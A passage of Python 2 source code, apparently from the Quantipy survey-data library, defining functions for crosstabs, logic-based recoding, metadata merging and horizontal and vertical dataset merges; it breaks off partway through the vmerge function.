def crosstab(meta, data, x, y, get='count', decimals=1, weight=None,
show='values', rules=False, xtotal=False):
"""
Return a type-appropriate crosstab of x and y.
This function uses the given meta and data to create a
type-appropriate cross-tabulation (pivot table) of the named x and y
variables. The result may be either counts or column percentages,
weighted or unweighted.
Parameters
----------
meta : dict
Quantipy meta document.
data : pandas.DataFrame
Data accompanying the given meta document.
x : str
The variable that should be placed into the x-position.
y : str
The variable that should be placed into the y-position.
get : str, default='count'
Control the type of data that is returned. 'count' will return
absolute counts and 'normalize' will return column percentages.
decimals : int, default=1
Control the number of decimals in the returned dataframe.
weight : str, default=None
The name of the weight variable that should be used on the data,
if any.
show : str, default='values'
How the index and columns should be displayed. 'values' returns
the raw value indexes. 'text' returns the text associated with
each value, according to the text key
meta['lib']['default text']. Any other str value is assumed to
be a non-default text_key.
rules : bool or list-like, default=False
If True then all rules that are found will be applied. If
list-like then rules with those keys will be applied.
xtotal : bool, default=False
If True, the first column of the returned dataframe will be the
regular frequency of the x column.
Returns
-------
df : pandas.DataFrame
The crosstab as a pandas DataFrame.
"""
stack = qp.Stack(name='ct', add_data={'ct': {'meta': meta, 'data': data}})
stack.add_link(x=x, y=y)
link = stack['ct']['no_filter'][x][y]
q = qp.Quantity(link, weight=weight).count()
weight_notation = '' if weight is None else weight
if get=='count':
df = q.result
vk = 'x|f|:||{}|counts'.format(weight_notation)
elif get=='normalize':
df = q.normalize().result
vk = 'x|f|:|y|{}|c%'.format(weight_notation)
else:
raise ValueError(
"The value for 'get' was not recognized. Should be 'count' or "
"'normalize'."
)
df = np.round(df, decimals=decimals)
if rules and isinstance(rules, bool):
rules = ['x', 'y']
if rules:
if qp.OPTIONS['new_rules']:
# new rules application
# ----------------------------------------------------------------
view = qp.core.view.View(link, vk)
view.dataframe = df
link[vk] = view
rulesobj = Rules(link, vk, axes=rules)
rulesobj.apply()
if rulesobj.x_rules and 'x' in rules:
idx = rulesobj.rules_df().index
if not 'All' in idx.get_level_values(1).tolist():
df_index = [(link.x, 'All')] + idx.values.tolist()
else:
df_index = idx.values.tolist()
df = df.loc[df_index]
if rulesobj.y_rules and 'y' in rules:
idx = rulesobj.rules_df().columns
if not 'All' in idx.get_level_values(1).tolist():
df_columns = [(link.y, 'All')] + idx.values.tolist()
else:
df_columns = idx.values.tolist()
df = df[df_columns]
else:
# OLD!
# ================================================================
rules_x = get_rules(meta, x, 'x')
if not rules_x is None and 'x' in rules:
fx = frequency(meta, data, x=x, weight=weight, rules=True)
if q._get_type() == 'array':
df = df.T
df = df.loc[fx.index.values]
df = df.T
else:
df = df.loc[fx.index.values]
rules_y = get_rules(meta, y, 'y')
if not rules_y is None and 'y' in rules:
fy = frequency(meta, data, y=y, weight=weight, rules=True)
df = df[fy.columns.values]
if show!='values':
if show=='text':
text_key = meta['lib']['default text']
else:
text_key = show
if not isinstance(text_key, dict):
text_key = {'x': text_key, 'y': text_key}
df = paint_dataframe(meta, df, text_key)
if xtotal:
try:
f = frequency(
meta, data, x,
get=get, decimals=decimals, weight=weight, show=show)
f = f.loc[df.index.values]
except:
pass
df = pd.concat([f, df], axis=1)
if q._get_type() == 'array':
df = df.T
return df
def verify_test_results(df):
"""
Verify tests results in df are consistent with existing columns.
This function verifies that all of the test results present in df
only refer to column headings that actually exist in df. This is
needed after rules have been applied at which time some columns
may have been dropped.
Parameters
----------
df : pandas.DataFrame
The view dataframe showing column tests results.
Returns
-------
df : pandas.DataFrame
The view dataframe showing edited column tests results.
"""
def verify_test_value(value):
"""
Verify a specific test value.
"""
if isinstance(value, str):
is_minimum = False
is_small = False
if value.endswith('*'):
if value.endswith('**'):
is_minimum = True
value = value[:-2]
else:
is_small = True
value = value[:-1]
if '@' in value:
test_total = value[1:5]
if len(value) <= 6:
if is_minimum:
value = value + '**'
elif is_small:
value = value + '*'
return value
else:
value = value.replace(test_total, '').replace('[, ', '[')
else:
test_total = None
if len(value)>0:
if len(value)==1:
value = set(value)
else:
value = set([int(i) for i in list(value[1:-1].split(','))])
value = cols.intersection(value)
if not value:
value = ''
elif len(value)==1:
value = str(list(value))
else:
value = str(sorted(list(value)))
if test_total:
value = value.replace('[', '[{}, '.format(test_total))
if is_minimum:
value = value + '**'
elif is_small:
value = value + '*'
elif len(value)==0:
value = np.NaN
return value
else:
return value
cols = set([int(v) for v in zip(*[c for c in df.columns])[1]])
df = df.applymap(verify_test_value)
return df
def index_mapper(meta, data, mapper, default=None, intersect=None):
"""
Convert a {value: logic} map to a {value: index} map.
This function takes a mapper of {key: logic} entries and resolves
the logic statements using the given meta/data to return a mapper
of {key: index}. The indexes returned can be used on data to isolate
the cases described by arbitrarily complex logical statements.
Parameters
----------
meta : dict
Quantipy meta document.
data : pandas.DataFrame
Data accompanying the given meta document.
mapper : dict
A mapper of {key: logic}
default : str
The column name to default to in cases where unattended lists
are given as logic, where an auto-transformation of {key: list}
to {key: {default: list}} is provided.
Returns
-------
index_mapper : dict
A mapper of {key: index}
"""
if default is None:
# Check that mapper isn't in a default-requiring
# format
for key, val in mapper.iteritems():
if not isinstance(val, (dict, tuple)):
raise TypeError(
"'%s' recode definition appears to be using "
"default-shorthand but no value for 'default'"
"was given." % (key)
)
keyed_mapper = mapper
else:
# Use default to correct the form of the mapper
# where un-keyed value lists were given
# Creates: {value: {source: logic}}
keyed_mapper = {
key:
{default: has_any(val)}
if isinstance(val, list)
else {default: val}
for key, val in mapper.iteritems()
}
# Apply any implied intersection
if not intersect is None:
keyed_mapper = {
key: intersection([
intersect,
value if isinstance(value, dict) else {default: value}])
for key, value in keyed_mapper.iteritems()
}
# Create temp series with a full data index
series = pd.Series(1, index=data.index)
# Return indexes from logic statements
# Creates: {value: index}
index_mapper = {
key: get_logic_index(series, logic, data)[0]
for key, logic in keyed_mapper.iteritems()
}
return index_mapper
def join_delimited_set_series(ds1, ds2, append=True):
"""
Item-wise join of two delimited sets.
This function takes a mapper of {key: logic} entries and resolves
the logic statements using the given meta/data to return a mapper
of {key: index}. The indexes returned can be used on data to isolate
the cases described by arbitrarily complex logical statements.
Parameters
----------
ds1 : pandas.Series
First delimited set series to join.
ds2 : pandas.Series
Second delimited set series to join.
append : bool
Should the data in ds2 (where found) be appended to items from
ds1? If False, data from ds2 (where found) will overwrite
whatever was found for that item in ds1 instead.
Returns
-------
joined : pandas.Series
The joined result of ds1 and ds2.
"""
if pd.__version__ == '0.19.2':
df = pd.concat([ds1, ds2], axis=1, ignore_index=True)
else:
df = pd.concat([ds1, ds2], axis=1)
df.fillna('', inplace=True)
if append:
df['joined'] = df[0] + df[1]
else:
df['joined'] = df[0].copy()
df[1] = df[1].replace('', np.NaN)
df['joined'].update(df[1].dropna())
joined = df['joined'].replace('', np.NaN)
return joined
def recode_from_index_mapper(meta, series, index_mapper, append):
"""
Convert a {value: logic} map to a {value: index} map.
This function takes a mapper of {key: logic} entries and resolves
the logic statements using the given meta/data to return a mapper
of {key: index}. The indexes returned can be used on data to isolate
the cases described by arbitrarily complex logical statements.
Parameters
----------
meta : dict
Quantipy meta document.
series : pandas.Series
The series in which the recoded data will be stored and
returned.
index_mapper : dict
A mapper of {key: index}
append : bool
Should the new recodd data be appended to items already found
in series? If False, data from series (where found) will
overwrite whatever was found for that item in ds1 instead.
Returns
-------
series : pandas.Series
The series in which the recoded data will be stored and
returned.
"""
qtype = meta['columns'][series.name]['type']
if qtype in ['delimited set']:
if series.dtype in ['int64', 'float64']:
not_null = series.notnull()
if len(not_null) > 0:
series.loc[not_null] = series.loc[not_null].map(str) + ';'
if index_mapper:
cols = [str(c) for c in sorted(index_mapper.keys())]
else:
vals = meta['columns'][series.name]['values']
codes = [c['value'] for c in vals]
cols = [str(c) for c in codes]
ds = pd.DataFrame(0, index=series.index, columns=cols)
for key, idx in index_mapper.iteritems():
ds[str(key)].loc[idx] = 1
ds2 = condense_dichotomous_set(ds)
org_name = series.name
series = join_delimited_set_series(series, ds2, append)
## Remove potential duplicate values
if series.dropna().empty:
warn_msg = 'Could not recode {}, found empty data column dependency!'.format(org_name)
warnings.warn(warn_msg)
return series
ds = series.str.get_dummies(';')
# Make sure columns are in numeric order
ds.columns = [int(float(c)) for c in ds.columns]
cols = sorted(ds.columns.tolist())
ds = ds[cols]
ds.columns = [str(i) for i in ds.columns]
# Reconstruct the dichotomous set
series = condense_dichotomous_set(ds)
elif qtype in ['single', 'int', 'float']:
for key, idx in index_mapper.iteritems():
series.loc[idx] = key
else:
raise TypeError(
"Can't recode '{col}'. Recoding for '{typ}' columns is not"
" yet supported.".format(col=series.name, typ=qtype)
)
return series
def recode(meta, data, target, mapper, default=None, append=False,
intersect=None, initialize=None, fillna=None):
"""
Return a new or copied series from data, recoded using a mapper.
This function takes a mapper of {key: logic} entries and injects the
key into the target column where its paired logic is True. The logic
may be arbitrarily complex and may refer to any other variable or
variables in data. Where a pre-existing column has been used to
start the recode, the injected values can replace or be appended to
any data found there to begin with. Note that this function does
not edit the target column, it returns a recoded copy of the target
column. The recoded data will always comply with the column type
indicated for the target column according to the meta.
Parameters
----------
meta : dict
Quantipy meta document.
data : pandas.DataFrame
Data accompanying the given meta document.
target : str
The column name that is the target of the recode. If target
is not found in meta['columns'] this will fail with an error.
If target is not found in data.columns the recode will start
from an empty series with the same index as data. If target
is found in data.columns the recode will start from a copy
of that column.
mapper : dict
A mapper of {key: logic} entries.
default : str, default=None
The column name to default to in cases where unattended lists
are given in your logic, where an auto-transformation of
{key: list} to {key: {default: list}} is provided. Note that
lists in logical statements are themselves a form of shorthand
and this will ultimately be interpreted as:
{key: {default: has_any(list)}}.
append : bool, default=False
Should the new recodd data be appended to values already found
in the series? If False, data from series (where found) will
overwrite whatever was found for that item instead.
intersect : logical statement, default=None
If a logical statement is given here then it will be used as an
implied intersection of all logical conditions given in the
mapper.
initialize : str or np.NaN, default=None
If not None, a copy of the data named column will be used to
populate the target column before the recode is performed.
Alternatively, initialize can be used to populate the target
column with np.NaNs (overwriting whatever may be there) prior
to the recode.
fillna : int, default=None
If not None, the value passed to fillna will be used on the
recoded series as per pandas.Series.fillna().
Returns
-------
series : pandas.Series
The series in which the recoded data is stored.
"""
# Error handling
# Check meta, data
if not isinstance(meta, dict):
raise ValueError("'meta' must be a dictionary.")
if not isinstance(data, pd.DataFrame):
raise ValueError("'data' must be a pandas.DataFrame.")
# Check mapper
if not isinstance(mapper, dict):
raise ValueError("'mapper' must be a dictionary.")
# Check target
if not isinstance(target, (str, unicode)):
raise ValueError("The value for 'target' must be a string.")
if not target in meta['columns']:
raise ValueError("'%s' not found in meta['columns']." % (target))
# Check append
if not isinstance(append, bool):
raise ValueError("'append' must be boolean.")
# Check column type vs append
if append and meta['columns'][target]['type']!="delimited set":
raise TypeError("'{}' is not a delimited set, cannot append.")
# Check default
if not default is None:
if not isinstance(default, (str, unicode)):
raise ValueError("The value for 'default' must be a string.")
if not default in meta['columns']:
raise ValueError("'%s' not found in meta['columns']." % (default))
# Check initialize
initialize_is_string = False
if not initialize is None:
if isinstance(initialize, (str, unicode)):
initialize_is_string = True
if not initialize in meta['columns']:
raise ValueError("'%s' not found in meta['columns']." % (target))
elif not np.isnan(initialize):
raise ValueError(
"The value for 'initialize' must either be"
" a string naming an existing column or np.NaN.")
# Resolve the logic to a mapper of {key: index}
index_map = index_mapper(meta, data, mapper, default, intersect)
# Get/create recode series
if not initialize is None:
if initialize_is_string:
# Start from a copy of another existing column
series = data[initialize].copy()
else:
# Ignore existing series for target, start with NaNs
series = pd.Series(np.NaN, index=data.index, copy=True)
elif target in data.columns:
# Start with existing target column
series = data[target].copy()
else:
# Start with NaNs
series = pd.Series(np.NaN, index=data.index, copy=True)
# Name the recoded series
series.name = target
# Use the index mapper to edit the target series
series = recode_from_index_mapper(meta, series, index_map, append)
# Rename the recoded series
series.name = target
if not fillna is None:
col_type = meta['columns'][series.name]['type']
if col_type=='single':
series.fillna(fillna, inplace=True)
elif col_type=='delimited set':
series.fillna('{};'.format(fillna), inplace=True)
return series
def merge_text_meta(left_text, right_text, overwrite=False):
"""
Merge known text keys from right to left, add unknown text_keys.
"""
if overwrite:
left_text.update(right_text)
else:
for text_key in right_text.keys():
if not text_key in left_text:
left_text[text_key] = right_text[text_key]
return left_text
def merge_values_meta(left_values, right_values, overwrite=False):
"""
Merge known left values from right to left, add unknown values.
"""
for val_right in right_values:
found = False
for i, val_left in enumerate(left_values):
if val_left['value']==val_right['value']:
found = True
left_values[i]['text'] = merge_text_meta(
val_left['text'],
val_right['text'],
overwrite=overwrite)
if not found:
left_values.append(val_right)
return left_values
def merge_column_metadata(left_column, right_column, overwrite=False):
"""
Merge the metadata from the right column into the left column.
"""
_compatible_types(left_column, right_column)
left_column['text'] = merge_text_meta(
left_column['text'],
right_column['text'],
overwrite=overwrite)
if 'values' in left_column and 'values' in right_column:
left_column['values'] = merge_values_meta(
left_column['values'],
right_column['values'],
overwrite=overwrite)
return left_column
def _compatible_types(left_column, right_column):
l_type = left_column['type']
r_type = right_column['type']
if l_type == r_type: return None
all_types = ['array', 'int', 'float', 'single', 'delimited set', 'string',
'date', 'time', 'boolean']
err = {
'array': all_types,
'int': [
'float', 'delimited set', 'string', 'date', 'time', 'array'],
'float': [
'delimited set', 'string', 'date', 'time', 'array'],
'single': all_types,
'delimited set': [
'string', 'date', 'time', 'array', 'int', 'float'],
'string': [
'int', 'float', 'single', 'delimited set', 'date', 'time', 'array'],
'date': [
'int', 'float', 'single', 'delimited set', 'string', 'time', 'array'],
'time': [
'int', 'float', 'single', 'delimited set', 'string', 'time', 'array'],
}
warn = {
'int': [
'single'],
'float': [
'int', 'single'],
'delimited set': [
'single'],
'string': [
'boolean']
}
if r_type in err.get(l_type, all_types):
msg = "\n'{}': Trying to merge incompatibe types: Found '{}' in left "
msg += "and '{}' in right dataset."
raise TypeError(msg.format(left_column['name'], l_type, r_type))
elif r_type in warn.get(l_type, all_types):
msg = "\n'{}': Merge inconsistent types: Found '{}' in left "
msg += "and '{}' in right dataset."
warnings.warn(msg.format(left_column['name'], l_type, r_type))
else:
msg = "\n'{}': Found '{}' in left and '{}' in right dataset."
raise TypeError(msg.format(left_column['name'], l_type, r_type))
def _update_mask_meta(left_meta, right_meta, masks, verbose, overwrite=False):
"""
"""
# update mask
if not isinstance(masks, list): masks = [masks]
for mask in masks:
old = left_meta['masks'][mask]
new = right_meta['masks'][mask]
for tk, t in new['text'].items():
if not tk in old['text'] or overwrite:
old['text'].update({tk: t})
for item in new['items']:
check_source = item['source']
check = 0
for old_item in old['items']:
if old_item['source'] == check_source:
check = 1
try:
for tk, t in item['text'].items():
if not tk in old_item['text'] or overwrite:
old_item['text'].update({tk: t})
except:
if verbose:
e = "'text' meta not valid for mask {}: item {}"
e = e.format(mask, item['source'].split('@')[-1])
print '{} - skipped!'.format(e)
else:
pass
if check == 0:
old['items'].append(item)
# also add these items to ``meta['sets']``
left_meta['sets'][mask]['items'].append(item['source'])
def merge_meta(meta_left, meta_right, from_set, overwrite_text=False,
get_cols=False, get_updates=False, verbose=True):
if verbose:
print '\n', 'Merging meta...'
if from_set is None:
from_set = 'data file'
# Find the columns to be merged
if from_set in meta_right['sets']:
if verbose:
print ("New columns will be appended in the order found in"
" meta['sets']['{}'].".format(from_set))
cols = []
masks = []
mask_items = {}
for item in meta_right['sets'][from_set]['items']:
source, name = item.split('@')
if source == 'columns':
cols.append(name)
elif source == 'masks':
masks.append(name)
for item in meta_right['masks'][name]['items']:
s, n = item['source'].split('@')
if s == 'columns':
cols.append(n)
if meta_right['masks'][name].get('values'):
mask_items[n] = 'lib@values@{}'.format(name)
cols = uniquify_list(cols)
if masks:
for mask in masks:
if not mask in meta_left['masks']:
if verbose:
print "Adding meta['masks']['{}']".format(mask)
meta_left['masks'][mask] = meta_right['masks'][mask]
else:
_update_mask_meta(meta_left, meta_right, mask, verbose,
overwrite=overwrite_text)
sets = [key for key in meta_right['sets']
if not key in meta_left['sets']]
if sets:
for set_name in sorted(sets):
if verbose:
print "Adding meta['sets']['{}']".format(set_name)
meta_left['sets'][set_name] = meta_right['sets'][set_name]
for val in meta_right['lib']['values'].keys():
if not val in meta_left['lib']['values']:
if verbose:
print "Adding meta['lib']['values']['{}']".format(val)
meta_left['lib']['values'][val] = meta_right['lib']['values'][val]
elif val == 'ddf' or (meta_left['lib']['values'][val] ==
meta_right['lib']['values'][val]):
continue
else:
n_values = [v['value'] for v in meta_right['lib']['values'][val]]
o_values = [v['value'] for v in meta_left['lib']['values'][val]]
add_values = [v for v in n_values if v not in o_values]
if add_values:
for value in meta_right['lib']['values'][val]:
if value['value'] in add_values:
meta_left['lib']['values'][val].append(value)
else:
if verbose:
print (
"No '{}' set was found, new columns will be appended"
" alphanumerically.".format(from_set)
)
cols = meta_right['columns'].keys().sort(key=str.lower)
col_updates = []
for col_name in cols:
if verbose:
print '...', col_name
# store properties
props = copy.deepcopy(
meta_right['columns'][col_name].get('properties', {}))
# emulate the right meta
right_column = emulate_meta(
meta_right,
meta_right['columns'][col_name])
if col_name in meta_left['columns'] and col_name in cols:
col_updates.append(col_name)
# emulate the left meta
left_column = emulate_meta(
meta_left,
meta_left['columns'][col_name])
# merge the eumlated metadata
meta_left['columns'][col_name] = merge_column_metadata(
left_column,
right_column,
overwrite=overwrite_text)
else:
# add metadata
if right_column.get('properties'):
right_column['properties']['merged'] = True
else:
right_column['properties'] = {'merged': True}
meta_left['columns'][col_name] = right_column
if 'properties' in meta_left['columns'][col_name]:
meta_left['columns'][col_name]['properties'].update(props)
if col_name in mask_items:
meta_left['columns'][col_name]['values'] = mask_items[col_name]
for item in meta_right['sets'][from_set]['items']:
if not item in meta_left['sets']['data file']['items']:
meta_left['sets']['data file']['items'].append(item)
if get_cols and get_updates:
return meta_left, cols, col_updates
elif get_cols:
return meta_left, cols
elif get_updates:
return meta_left, col_updates
else:
return meta_left
def get_columns_from_mask(meta, mask_name):
"""
Recursively retrieve the columns indicated by the named mask.
"""
cols = []
for item in meta['masks'][mask_name]['items']:
source, name = item['source'].split('@')
if source=='columns':
cols.append(name)
elif source=='masks':
cols.extend(get_columns_from_mask(meta, name))
elif source=='sets':
cols.extend(get_columns_from_set(meta, name))
else:
raise KeyError(
"Unsupported meta-mapping: {}".format(item))
return cols
def get_columns_from_set(meta, set_name):
"""
Recursively retrieve the columns indicated by the named set.
"""
cols = []
for item in meta['sets'][set_name]['items']:
source, name = item.split('@')
if source=='columns':
cols.append(name)
elif source=='masks':
cols.extend(get_columns_from_mask(meta, name))
elif source=='sets':
cols.extend(get_columns_from_set(meta, name))
else:
raise KeyError(
"Unsupported meta-mapping: {}".format(item))
cols = qp.core.tools.dp.query.uniquify_list(cols)
return cols
def get_masks_from_mask(meta, mask_name):
"""
Recursively retrieve the masks indicated by the named mask.
"""
masks = []
for item in meta['masks'][mask_name]['items']:
source, name = item['source'].split('@')
if source=='masks':
masks.append(name)
elif source=='columns':
pass
elif source=='sets':
masks.extend(get_masks_from_set(meta, name))
else:
raise KeyError(
"Unsupported meta-mapping: {}".format(item))
return masks
def get_masks_from_set(meta, set_name):
"""
Recursively retrieve the masks indicated by the named set.
"""
masks = []
for item in meta['sets'][set_name]['items']:
source, name = item.split('@')
if source=='masks':
masks.append(name)
elif source=='columns':
pass
elif source=='sets':
masks.extend(get_masks_from_mask(meta, name))
else:
raise KeyError(
"Unsupported meta-mapping: {}".format(item))
return masks
def get_sets_from_mask(meta, mask_name):
"""
Recursively retrieve the sets indicated by the named mask.
"""
sets = []
for item in meta['masks'][mask_name]['items']:
source, name = item['source'].split('@')
if source=='sets':
sets.append(name)
elif source=='columns':
pass
elif source=='masks':
sets.extend(get_sets_from_mask(meta, name))
else:
raise KeyError(
"Unsupported meta-mapping: {}".format(item))
return sets
def get_sets_from_set(meta, set_name):
"""
Recursively retrieve the sets indicated by the named set.
"""
sets = []
for item in meta['sets'][set_name]['items']:
source, name = item.split('@')
if source=='sets':
sets.append(name)
elif source=='columns':
pass
elif source=='masks':
sets.extend(get_sets_from_mask(meta, name))
else:
raise KeyError(
"Unsupported meta-mapping: {}".format(item))
return sets
def hmerge(dataset_left, dataset_right, on=None, left_on=None, right_on=None,
overwrite_text=False, from_set=None, merge_existing=None, verbose=True):
"""
Merge Quantipy datasets together using an index-wise identifer.
This function merges two Quantipy datasets (meta and data) together,
updating variables that exist in the left dataset and appending
others. New variables will be appended in the order indicated by
the 'data file' set if found, otherwise they will be appended in
alphanumeric order. This merge happend horizontally (column-wise).
Packed kwargs will be passed on to the pandas.DataFrame.merge()
method call, but that merge will always happen using how='left'.
Parameters
----------
dataset_left : tuple
A tuple of the left dataset in the form (meta, data).
dataset_right : tuple
A tuple of the right dataset in the form (meta, data).
on : str, default=None
The column to use as a join key for both datasets.
left_on : str, default=None
The column to use as a join key for the left dataset.
right_on : str, default=None
The column to use as a join key for the right dataset.
overwrite_text : bool, default=False
If True, text_keys in the left meta that also exist in right
meta will be overwritten instead of ignored.
from_set : str, default=None
Use a set defined in the right meta to control which columns are
merged from the right dataset.
merge_existing : str/ list of str, default None, {'all', [var_names]}
Specify if codes should be merged for delimited sets for defined
variables.
verbose : bool, default=True
Echo progress feedback to the output pane.
Returns
-------
meta, data : dict, pandas.DataFrame
Updated Quantipy dataset.
"""
def _merge_delimited_sets(x):
codes = []
x = str(x).replace('nan', '')
for c in x.split(';'):
if not c:
continue
if not c in codes:
codes.append(c)
if not codes:
return np.NaN
else:
return ';'.join(sorted(codes)) + ';'
if all([kwarg is None for kwarg in [on, left_on, right_on]]):
raise TypeError("You must provide a column name for either 'on' or "
"both 'left_on' AND 'right_on'")
elif not on is None and not (left_on is None and right_on is None):
raise ValueError("You cannot provide a value for both 'on' and either/"
"both 'left_on'/'right_on'.")
elif on is None and (left_on is None or right_on is None):
raise TypeError("You must provide a column name for both 'left_on' "
"AND 'right_on'")
elif not on is None:
left_on = on
right_on = on
meta_left = copy.deepcopy(dataset_left[0])
data_left = dataset_left[1].copy()
if isinstance(dataset_right, tuple): dataset_right = [dataset_right]
for ds_right in dataset_right:
meta_right = copy.deepcopy(ds_right[0])
data_right = ds_right[1].copy()
slicer = data_right[right_on].isin(data_left[left_on].values.tolist())
data_right = data_right.loc[slicer, :]
if verbose:
print '\n', 'Checking metadata...'
if from_set is None:
from_set = 'data file'
# Merge the right meta into the left meta
meta_left, cols, col_updates = merge_meta(meta_left, meta_right,
from_set, overwrite_text,
True, True, verbose)
# col_updates exception when left_on==right_on
if left_on==right_on:
col_updates.remove(left_on)
if not left_on==right_on and right_on in col_updates:
update_right_on = True
else:
update_right_on = False
if verbose:
print '\n', 'Merging data...'
# update columns which are in left and in right data
if col_updates:
updata_left = data_left.copy()
updata_left['org_idx'] = updata_left.index.tolist()
updata_left = updata_left.set_index([left_on])[col_updates+['org_idx']]
updata_right = data_right.set_index(
right_on, drop=not update_right_on)[col_updates].copy()
sets = [c for c in col_updates
if meta_left['columns'][c]['type'] == 'delimited set']
non_sets = [c for c in col_updates if not c in sets]
if verbose:
print '------ updating data for known columns'
updata_left.update(updata_right[non_sets])
if merge_existing:
for col in sets:
if not (merge_existing == 'all' or col in merge_existing):
continue
if verbose:
print "..{}".format(col)
updata_left[col] = updata_left[col].combine(
updata_right[col],
lambda x, y: _merge_delimited_sets(str(x)+str(y)))
updata_left.reset_index(inplace=True)
for col in col_updates:
data_left[col] = updata_left[col].astype(data_left[col].dtype)
# append completely new columns
if verbose:
print '------ appending new columns'
new_cols = [col for col in cols if not col in col_updates]
if update_right_on:
new_cols.append(right_on)
kwargs = {'left_on': left_on,
'right_on': right_on,
'how': 'left'}
data_left = data_left.merge(data_right[new_cols], **kwargs)
if update_right_on:
new_cols.remove(right_on)
_x = "{}_x".format(right_on)
_y = "{}_y".format(right_on)
data_left.rename(columns={_x: right_on}, inplace=True)
data_left.drop(_y, axis=1, inplace=True)
if verbose:
for col_name in new_cols:
print '..{}'.format(col_name)
print '\n'
return meta_left, data_left
def vmerge(dataset_left=None, dataset_right=None, datasets=None,
on=None, left_on=None, right_on=None,
row_id_name=None, left_id=None, right_id=None, row_ids=None,
overwrite_text=False, from_set=None, reset_index=True,
verbose=True):
"""
Merge Quantipy datasets together by appending rows.
This function merges two Quantipy datasets (meta and data) together,
updating variables that exist in the left dataset and appending
others. New variables will be appended in the order indicated by
the 'data file' set if found, otherwise they will be appended in
alphanumeric order. This merge happens vertically (row-wise).
Parameters
----------
dataset_left : tuple, default=None
A tuple of the left dataset in the form (meta, data).
dataset_right : tuple, default=None
A tuple of the right dataset in the form (meta, data).
datasets : list, default=None
A list of datasets that will be iteratively sent into vmerge
in pairs.
on : str, default=None
The column to use to identify unique rows in both datasets.
left_on : str, default=None
The column to use to identify unique in the left dataset.
right_on : str, default=None
The column to use to identify unique in the right dataset.
row_id_name : str, default=None
The named column will be filled with the ids indicated for each
dataset, as per left_id/right_id/row_ids. If meta for the named
column doesn't already exist a new column definition will be
added and assigned a reductive-appropriate type.
left_id : str/int/float, default=None
Where the row_id_name column is not already populated for the
dataset_left, this value will be populated.
right_id : str/int/float, default=None
Where the row_id_name column is not already populated for the
dataset_right, this value will be populated.
row_ids : list of str/int/float, default=None
When datasets has been used, this list provides the row ids
that will be populated in the row_id_name column for each of
those datasets, respectively.
overwrite_text : bool, default=False
If True, text_keys in the left meta that also exist in right
meta will be overwritten instead of ignored.
from_set : str, default=None
Use a set defined in the right meta to control which columns are
merged from the right dataset.
reset_index : bool, default=True
If True pandas.DataFrame.reindex() will be applied to the merged
dataframe.
verbose : bool, default=True
Echo progress feedback to the output pane.
Returns
-------
meta, data : dict, pandas.DataFrame
Updated Quantipy dataset.
"""
if from_set is None:
from_set = 'data file'
if not datasets is None:
if not isinstance(datasets, list):
raise TypeError(
"'datasets' must be a list.")
if not datasets:
raise ValueError(
"'datasets' must be a populated list.")
for dataset in datasets:
if not isinstance(dataset, tuple):
raise TypeError(
"The datasets in 'datasets' must be tuples.")
if not len(dataset)==2:
raise ValueError(
"The datasets in 'datasets' must be tuples with a"
" size of 2 (meta, data).")
dataset_left = datasets[0]
if row_ids:
left_id = row_ids[0]
for i in range(1, len(datasets)):
dataset_right = datasets[i]
if row_ids:
right_id = row_ids[i]
meta_vm, data_vm = vmerge(
dataset_left, dataset_right,
on=on, left_on=left_on, right_on=right_on,
row_id_name=row_id_name, left_id=left_id, right_id=right_id,
overwrite_text=overwrite_text, from_set=from_set,
reset_index=reset_index,
verbose=verbose)
dataset_left = (meta_vm, data_vm)
return meta_vm, data_vm
if on is None and left_on is None and right_on is None:
blind_append = True
else:
blind_append = False
if on is None:
if left_on is None or right_on is None:
raise ValueError(
"You may not provide a value for only one of"
"'left_on'/'right_on'.")
else:
if not left_on is None or not right_on is None:
raise ValueError(
"You cannot provide a value for both 'on' and either/"
"both 'left_on'/'right_on'.")
left_on = on
right_on = on
meta_left = cpickle_copy(dataset_left[0])
data_left = dataset_left[1].copy()
if not blind_append:
if not left_on in data_left.columns:
raise KeyError(
"'{}' not found in the left data.".format(left_on))
if not left_on in meta_left['columns']:
raise KeyError(
"'{}' not found in the left meta.".format(left_on))
meta_right = cpickle_copy(dataset_right[0])
data_right = dataset_right[1].copy()
if not blind_append:
if not right_on in data_left.columns:
raise KeyError(
"'{}' not found in the right data.".format(right_on))
if not right_on in meta_left['columns']:
raise KeyError(
"'{}' not found in the right meta.".format(right_on))
if not row_id_name is None:
if left_id is None and right_id is None:
raise TypeError(
"When indicating a 'row_id_name' you must also"
" provide either 'left_id' or 'right_id'.")
if row_id_name in meta_left['columns']:
pass
# text_key_right = meta_right['lib']['default text']
# meta_left['columns'][row_id_name]['text'].update({
# text_key_right: 'vmerge row id'})
else:
left_id_int = isinstance(left_id, (int, np.int64))
right_id_int = isinstance(right_id, (int, np.int64))
if left_id_int and right_id_int:
id_type = 'int'
else:
left_id_float = isinstance(left_id, (float, np.float64))
right_id_float = isinstance(right_id, (float, np.float64))
if (left_id_int or left_id_float) and (right_id_int or right_id_float):
id_type = 'float'
left_id = float(left_id)
right_id = float(right_id)
else:
id_type = 'str'
left_id = str(left_id)
right_id = str(right_id)
if verbose:
print (
"'{}' was not found in the left meta so a new"
" column definition will be created for it. Based"
" on the given 'left_id' and 'right_id' types this"
" new column will be given the type '{}'.".format(
row_id_name,
id_type))
text_key_left = meta_left['lib']['default text']
text_key_right = meta_right['lib']['default text']
meta_left['columns'][row_id_name] = {
'name': row_id_name,
'type': id_type,
'text': {
text_key_left: 'vmerge row id',
text_key_right: 'vmerge row id'}}
id_mapper = "columns@{}".<EMAIL>(row_id_name)
if not id_mapper in meta_left['sets']['data file']['items']:
meta_left['sets']['data file']['items'].append(id_mapper)
# Add the left and right id values
if not left_id is None:
if row_id_name in data_left.columns:
left_id_rows = data_left[row_id_name].isnull()
data_left.ix[left_id_rows, row_id_name] = left_id
else:
data_left[row_id_name] = left_id
if not right_id is None:
data_right[row_id_name] = right_id
if verbose:
print '\n', 'Checking metadata...'
# Merge the right meta into the left meta
meta_left, cols, col_updates = merge_meta(
meta_left, meta_right,
from_set=from_set,
overwrite_text=overwrite_text,
get_cols=True,
get_updates=True,
verbose=verbose)
if not blind_append:
vmerge_slicer = data_right[left_on].isin(data_left[right_on])
data_right = data_right.loc[~vmerge_slicer]
# convert right cols to delimited set if depending left col is delimited set
for col in data_right.columns.tolist():
if (meta_left['columns'].get(col, {}).get('type') == 'delimited set'
and not meta_right['columns'][col]['type'] == 'delimited set'):
data_right[col] = data_right[col].apply(
lambda x: str(int(x)) + ';' if not np.isnan(x) else np.NaN)
vdata = pd.concat([
data_left,
data_right
])
# Determine columns that should remain in the merged data
cols_left = data_left.columns.tolist()
col_slicer = cols_left + [
col for col in get_columns_from_set(meta_right, from_set)
if not col in cols_left]
vdata = vdata[col_slicer]
